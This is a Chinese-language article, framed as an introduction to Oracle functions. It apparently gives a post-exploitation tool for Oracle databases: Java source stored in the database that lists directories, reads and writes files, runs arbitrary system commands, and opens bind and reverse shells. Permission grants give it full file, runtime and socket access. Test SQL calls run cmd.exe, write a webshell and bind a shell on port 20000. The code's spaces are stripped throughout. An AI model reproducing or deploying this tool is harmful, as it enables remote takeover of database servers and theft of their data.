在向大家详细介绍Oracle函数之前,首先让大家了解下Oracle数据库建立JAVA对象,然后全面介绍Oracle函数,希望对大家有用。首先在Oracle数据库建立JAVA对象, 这个版本的SQLJ-SHELL 只能支持正向连接,反向连接的时候有BUG 不建议使用,不知道是ORA支持JAVA的问题还是个人能力有限:
- createorreplaceandcompilejavasourcenamedistoas
- importjava.io.*;
- importjava.net.*;
- publicclassISTO{
- //author:kj021320
- //team:I.S.T.O
- publicstaticStringlistFolder(Stringpath){
- Filef=null;
- Stringstr="";
- f=newFile(path);
- String[]ffiles=f.list();
- if(files!=null)
- for(inti=0;i<files.length;i++){
- str+=files[i]+"\r\n";
- }
- returnstr;
- }
- publicstaticStringsaveFile(Stringfilepath,Stringvalue){
- FileOutputStreamfos=null;
- try{
- fos=newFileOutputStream(filepath);
- fos.write(value.getBytes());
- return"OK";
- }catch(Exceptione){
- returne.getMessage();
- }finally{
- if(fos!=null){
- try{fos.close();}catch(Exceptione){}
- }
- }
- }
- publicstaticStringreadFile(Stringpathfile,Stringcode){
- BufferedReaderbr=null;
- Stringvalue="";
- try{
- br=newBufferedReader(newInputStreamReader(newFileInputStream(pathfile),code));
- Strings=null;
- while((s=br.readLine())!=null){
- value+=s;
- }
- returnvalue;
- }catch(Exceptione){
- returne.getMessage();
- }finally{
- if(br!=null){try{br.close();}catch(IOExceptione){}}
- }
- }
- publicstaticStringexecFile(Stringfilepath,Stringcode){
- inti=0;
- RuntimeRuntimert=Runtime.getRuntime();
- Stringoutput="";
- InputStreamReaderisr=null;
- char[]bufferC=newchar[1024];
- try{
- Processps=rt.exec(filepath);
- isr=newInputStreamReader(ps.getInputStream(),code);
- while((i=isr.read(bufferC,0,bufferC.length))!=-1){
- output+=newString(bufferC,0,i);
- }
- returnoutput;
- }catch(Exceptione){
- returne.getMessage();
- }finally{
- if(isr!=null)try{isr.close();}catch(IOExceptione){}
- }
- }
- publicstaticStringbindShell(intport){
- ServerSocketss=null;
- Sockets=null;
- try{
- ss=newServerSocket(port);
- s=ss.accept();
- newoptShell(ss,s).start();
- return"OK";
- }catch(Exceptione){
- returne.getMessage();
- }
- }
- publicstaticStringreverseShell(Stringhost,intport){
- Sockets=null;
- try{
- s=newSocket(host,port);
- newoptShell(null,s).start();
- return"OK";
- }catch(Exceptione){
- returne.getMessage();
- }
- }
- publicstaticclassoptShellextendsThread{
- OutputStreamos=null;
- InputStreamis=null;
- ServerSocketss;
- Sockets;
- publicoptShell(ServerSocketss,Sockets){
- this.ss=ss;
- this.s=s;
- try{
- this.is=s.getInputStream();
- this.os=s.getOutputStream();
- }catch(Exceptione){
- if(os!=null)try{os.close();}catch(Exceptionex){}
- if(is!=null)try{is.close();}catch(Exceptionex){}
- if(s!=null)try{s.close();}catch(Exceptionex){}
- if(ss!=null)try{ss.close();}catch(Exceptionex){}
- }
- }
- publicvoidrun(){
- BufferedReaderbr=newBufferedReader(newInputStreamReader(is));
- Stringline="";
- Stringcmdhelp="Command:\r\nlist\r\nsave\r\nread\r\nexec\r\nexit\r\n";
- try{
- //os.write(cmdhelp.getBytes());
- line=br.readLine();
- while(!"exit".equals(line)){
- if(line.length()>3){
- StringBuffersb=newStringBuffer(line.trim());
- Stringcmd=sb.substring(0,4);
- if(cmd.equals("list")){
- os.write("inputyoupath:\r\n".getBytes());
- line=br.readLine();
- os.write(listFolder(line).getBytes());
- }elseif("save".equals(cmd)){
- os.write("inputyoufilepath:\r\n".getBytes());
- line=br.readLine();
- os.write("inputyouvalue:\r\n".getBytes());
- os.write(saveFile(line,br.readLine()).getBytes());
- }elseif("read".equals(cmd)){
- os.write("inputyoufilepath:\r\n".getBytes());
- line=br.readLine();
- os.write("inputyoucodeexamle:GBK\r\n".getBytes());
- os.write(readFile(line,br.readLine()).getBytes());
- }elseif("exec".equals(cmd)){
- os.write("inputyourunfilepath:\r\n".getBytes());
- line=br.readLine();
- os.write("inputyoucodeexamle:GBK\r\n".getBytes());
- os.write(execFile(line,br.readLine()).getBytes());
- }else{
- os.write(cmdhelp.getBytes());
- }
- }else{
- os.write(cmdhelp.getBytes());
- }
- line=br.readLine();
- }
- }catch(Exceptione){
- e.printStackTrace();
- }finally{
- if(os!=null)try{os.close();}catch(Exceptione){}
- if(is!=null)try{is.close();}catch(Exceptione){}
- if(s!=null)try{s.close();}catch(Exceptione){}
- if(ss!=null)try{ss.close();}catch(Exceptione){}
- }
- }
- }
- }
以上建立完成之后 需要用Oracle函数调用JAVA的静态方法:
◆列举目录函数
◆保存文件函数
◆读文件函数
◆运行文件函数
◆端口绑定 你可以telnet进去
以上Oracle函数转换操作之后 需要给JAVA授予访问权限
- begin
- Dbms_Java.Grant_Permission('用户名字','java.io.FilePermission','<<ALL FILES>>','read,write,execute,delete');
- Dbms_Java.Grant_Permission('用户名字','java.lang.RuntimePermission','*','writeFileDescriptor');
- Dbms_Java.grant_permission('用户名字','java.net.SocketPermission','*:*','accept,connect,listen,resolve');
- end;
然后就可以进行文件操作以及 运行程序 开启网络!
以下为测试代码:
- SELECT ISTO_LISTFOLDER('/usr') FROM DUAL
- SELECT ISTO_EXECFILE('C:\WINDOWS\system32\cmd.exe /c dir c:\','GBK') FROM DUAL;
- SELECT ISTO_READFILE('/tmp/1.txt','GBK') FROM DUAL;
- SELECT ISTO_SAVEFILE('/tmp/1.txt','一句话shell') FROM DUAL;
- SELECT ISTO_BINDSHELL(20000) FROM DUAL
【编辑推荐】